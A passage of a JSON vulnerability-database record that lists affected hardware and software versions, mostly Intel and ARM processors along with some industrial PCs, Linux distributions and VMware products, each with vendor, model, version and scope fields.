        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3736g"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4590t"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4650_v4"
      },
      {
        "_id": null,
        "model": "xeon e5 2648l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3785"
      },
      {
        "_id": null,
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7250f"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4850_v4"
      },
      {
        "_id": null,
        "model": "cortex-a73",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4809_v3"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4150"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "_id": null,
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7295"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3750"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2699_v3"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4807"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6140"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4810mq"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3558"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e6540"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2660_v3"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4660_v4"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3590"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "520m"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2680_v3"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3050"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2687w_v4"
      },
      {
        "_id": null,
        "model": "xeon bronze 3104",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3610qm"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4600u"
      },
      {
        "_id": null,
        "model": "dl ppc21.5m 7000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4100m"
      },
      {
        "_id": null,
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j3160"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5687"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "661"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4258u"
      },
      {
        "_id": null,
        "model": "xeon e5 2620 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e3805"
      },
      {
        "_id": null,
        "model": "linux enterprise software development kit",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "12"
      },
      {
        "_id": null,
        "model": "xeon e3 1105c v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2609 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "bl rackmount 4u",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7700"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5620"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3570t"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2348m"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "390m"
      },
      {
        "_id": null,
        "model": "el ppc 1000\\/m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "380m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6442eq"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "920"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8600k"
      },
      {
        "_id": null,
        "model": "bl2 bpc 7000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "atom e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e3827"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7700t"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4648_v3"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2125"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2550k"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8880l_v2"
      },
      {
        "_id": null,
        "model": "esxi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "vmware",
        "version": "5.5.0"
      },
      {
        "_id": null,
        "model": "xeon e3 1265l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "simatic itc1500 pro",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.1"
      },
      {
        "_id": null,
        "model": "fusion",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "vmware",
        "version": "8.0.0"
      },
      {
        "_id": null,
        "model": "cortex-a8",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2609 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2420",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2720qm"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610y"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8650u"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8870_v4"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n4100"
      },
      {
        "_id": null,
        "model": "xeon e3 1230 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2520"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4670k"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610_v2"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6685r"
      },
      {
        "_id": null,
        "model": "xeon e3 1225 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4785t"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2670_v2"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6500"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4809_v4"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5618"
      },
      {
        "_id": null,
        "model": "xeon e5 1650 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2675qm"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e6510"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2450m"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3555le"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2450p"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3955"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4278u"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2629m"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "640um"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "640m"
      },
      {
        "_id": null,
        "model": "diskstation manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "synology",
        "version": "6.2.2-24922"
      },
      {
        "_id": null,
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "12"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3840qm"
      },
      {
        "_id": null,
        "model": "simatic itc1900",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.1"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4760hq"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2820"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2649m"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6130f"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4510u"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5600u"
      },
      {
        "_id": null,
        "model": "xeon e5 2630l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3530"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3220"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3450s"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4030y"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5609"
      },
      {
        "_id": null,
        "model": "xeon e5 1428l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3460"
      },
      {
        "_id": null,
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3130"
      },
      {
        "_id": null,
        "model": "vl2 ppc 7000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4440"
      },
      {
        "_id": null,
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4114t"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3380m"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4627_v2"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4310u"
      },
      {
        "_id": null,
        "model": "xeon e3 1268l v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1280 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "330um"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2400"
      },
      {
        "_id": null,
        "model": "xeon e3 1280 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "11"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2820qm"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5630"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4655_v3"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5670"
      },
      {
        "_id": null,
        "model": "xeon e5 2637 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3517u"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l3426"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2500s"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2380p"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2500t"
      },
      {
        "_id": null,
        "model": "xeon e3 1225 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2530"
      },
      {
        "_id": null,
        "model": "cortex-r8",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3632qm"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4350"
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "12.04"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5503"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3060"
      },
      {
        "_id": null,
        "model": "xeon e5 1660 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5120t"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2715qe"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8893_v4"
      },
      {
        "_id": null,
        "model": "vl bpc 3000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7y75"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "620lm"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "610e"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "980"
      },
      {
        "_id": null,
        "model": "xeon e5 2618l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4702ec"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3130m"
      },
      {
        "_id": null,
        "model": "bl ppc15 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "cortex-a78ae",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4702mq"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8880_v4"
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8158"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4300m"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2658_v3"
      },
      {
        "_id": null,
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3265rk"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2600s"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4627_v3"
      },
      {
        "_id": null,
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1578l_v5"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n4000"
      },
      {
        "_id": null,
        "model": "xeon e5 2643 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1270 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3427u"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8350k"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4690"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3470t"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3612qe"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6140m"
      },
      {
        "_id": null,
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7285"
      },
      {
        "_id": null,
        "model": "workstation",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "vmware",
        "version": "12.0.0"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2697_v2"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2700k"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2660"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5575r"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8891_v4"
      },
      {
        "_id": null,
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4112"
      },
      {
        "_id": null,
        "model": "xeon e5 2428l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2640 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3687u"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3245"
      },
      {
        "_id": null,
        "model": "xeon e3 1125c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5508"
      },
      {
        "_id": null,
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7235"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2370m"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5677"
      },
      {
        "_id": null,
        "model": "hci",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2650 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8250u"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4600m"
      },
      {
        "_id": null,
        "model": "pentium j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j2850"
      },
      {
        "_id": null,
        "model": "xeon e3 1220l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2698_v4"
      },
      {
        "_id": null,
        "model": "xeon e5 2650l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2105"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4790k"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8700k"
      },
      {
        "_id": null,
        "model": "xeon e5 2407",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2450l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2640",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "btc14",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "pepperl fuchs",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2310m"
      },
      {
        "_id": null,
        "model": "pentium j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j2900"
      },
      {
        "_id": null,
        "model": "xeon e5 2650l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6350hq"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5520"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8700"
      },
      {
        "_id": null,
        "model": "cortex-a17",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2630l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3227u"
      },
      {
        "_id": null,
        "model": "xeon e3 1235l v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "cortex-a9",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4110e"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4670t"
      },
      {
        "_id": null,
        "model": "xeon e3 1260l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5122"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
